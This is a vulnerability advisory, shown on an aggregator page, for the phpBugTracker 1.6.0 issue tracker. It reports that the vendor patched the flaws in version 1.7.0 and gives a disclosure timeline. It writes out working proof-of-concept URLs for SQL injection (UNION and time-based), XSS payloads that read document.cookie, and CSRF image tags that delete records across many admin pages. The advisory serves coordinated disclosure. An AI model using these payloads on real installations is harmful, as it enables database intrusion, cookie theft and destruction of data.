Vulners
Lucene search
phpBugTracker 1.6.0 CSRF / XSS / SQL Injection
🗓️ 19 Feb 2015 00:00:00Reported by Steffen RoesemannType 
packetstorm🔗 packetstormsecurity.com👁 28 Views
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | phpBugTracker 1.6.0 - Multiple Vulnerabilities | 23 Feb 201500:00 | – | zdt |
 | CVE-2004-1519 | 19 Feb 200505:00 | – | cve |
 | CVE-2004-1519 | 19 Feb 200505:00 | – | cvelist |
 | phpBugTracker 1.6.0 - Multiple Vulnerabilities | 23 Feb 201500:00 | – | exploitdb |
 | EUVD-2004-1513 | 7 Oct 202500:30 | – | euvd |
 | phpBugTracker 1.6.0 - Multiple Vulnerabilities | 23 Feb 201500:00 | – | exploitpack |
 | CVE-2004-1519 | 31 Dec 200405:00 | – | nvd |
`Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in
phpBugTracker v.1.6.0
Advisory ID: SROEADV-2015-16
Author: Steffen Rösemann
Affected Software: phpBugTracker v.1.6.0
Vendor URL: https://github.com/a-v-k/phpBugTracker
Vendor Status: patched
CVE-ID: will asked to be assigned after release on FullDisclosure via
OSS-list
Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31
==========================
Vulnerability Description:
==========================
The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-,
stored/reflected XSS- and CSRF-vulnerabilities.
==================
Technical Details:
==================
The following files used in a common phpBugTracker installation suffer from
different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:
===========
project.php
===========
SQL injection / underlaying CSRF vulnerability in project.php via id
parameter:
http://
{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+
Stored XSS via input field "project name":
http://{TARGET}/admin/project.php?op=add
executed in: e.g. http://{TARGET}/admin/project.php, http://
{TARGET}/index.php
========
user.php
========
Reflecting XSS in user.php via use_js parameter:
http://
{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1
executed in: same page
=========
group.php
=========
Reflecting XSS in group.php via use_js parameter:
http://
{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1
executed in: same page
(Blind) SQL Injection / underlaying CSRF vulnerability in group.php via
group_id parameter (used in different operations):
http://
{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
http://
{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+
==========
status.php
==========
SQL injection / underlaying CSRF vulnerability in status.php via status_id
parameter:
http://
{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
Stored XSS via input field "Description":
http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0
executed in: e.g. http://{TARGET}/admin/status.php
CSRF vulnerability in status.php (delete statuses):
<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}"
>
==============
resolution.php
==============
SQL injection / underlaying CSRF vulnerability in resolution.php via
resolution_id parameter:
http://
{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
CSRF vulnerability in resolution.php (delete resolutions):
<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}"
>
============
severity.php
============
SQL injection / underlaying CSRF vulnerability in severity.php via
severity_id parameter:
http://
{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
CSRF vulnerability in severity.php (delete severities):
<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}"
>
Stored XSS in severity.php via input field "Description":
http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0
executed in: e.g. http://{TARGET}/admin/severity.php
============
priority.php
============
SQL injection / underlaying CSRF vulnerability in priority.php via
priority_id parameter:
http://
{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+
======
os.php
======
SQL Injection / underlaying CSRF vulnerability in os.php via os_id
parameter:
http://
{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
CSRF vulnerability in os.php (delete operating systems):
<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >
Stored XSS vulnerability in os.php via input field "Regex":
http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0
executed in: e.g. http://{TARGET}/admin/os.php?
============
database.php
============
SQL injection / underlaying CSRF vulnerability in database.php via
database_id:
http://
{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+
CSRF vulnerability in database.php (delete databases):
<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}"
>
Stored XSS vulnerability in database.php via input field "Name":
http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0
========
site.php
========
CSRF vulnerability in site.php (delete sites):
<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >
SQL injection / underlaying CSRF vulnerability in site.php via site_id
parameter:
http://
{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+
=======
bug.php
=======
This issue has already been assigned CVE-2004-1519, but seems to have not
been corrected since the assignment:
SQL injection / underlaying CSRF vulnerability in bug.php via project
parameter:
http://
{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+
For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519.
=========
Solution:
=========
Update to version 1.7.0.
====================
Disclosure Timeline:
====================
03/05-Feb-2015 – found the vulnerabilities
05-Feb-2015 - informed the developers (see [3])
05-Feb-2015 – release date of this security advisory [without technical
details]
05-Feb-2015 - forked the Github repository, to keep it available for other
security researchers (see [4])
05/06-Feb-2015 - vendor replied, will provide a patch for the
vulnerabilities
09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical
details will be released on 19th February 2015
19-Feb-2015 - release date of this security advisory
19-Feb-2015 - send to FullDisclosure
========
Credits:
========
Vulnerabilities found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] https://github.com/a-v-k/phpBugTracker
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html
[3] https://github.com/a-v-k/phpBugTracker/issues/4
[4] https://github.com/sroesemann/phpBugTracker
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Feb 2015 00:00Current
1.1Low risk
Vulners AI Score1.1
EPSS0.00677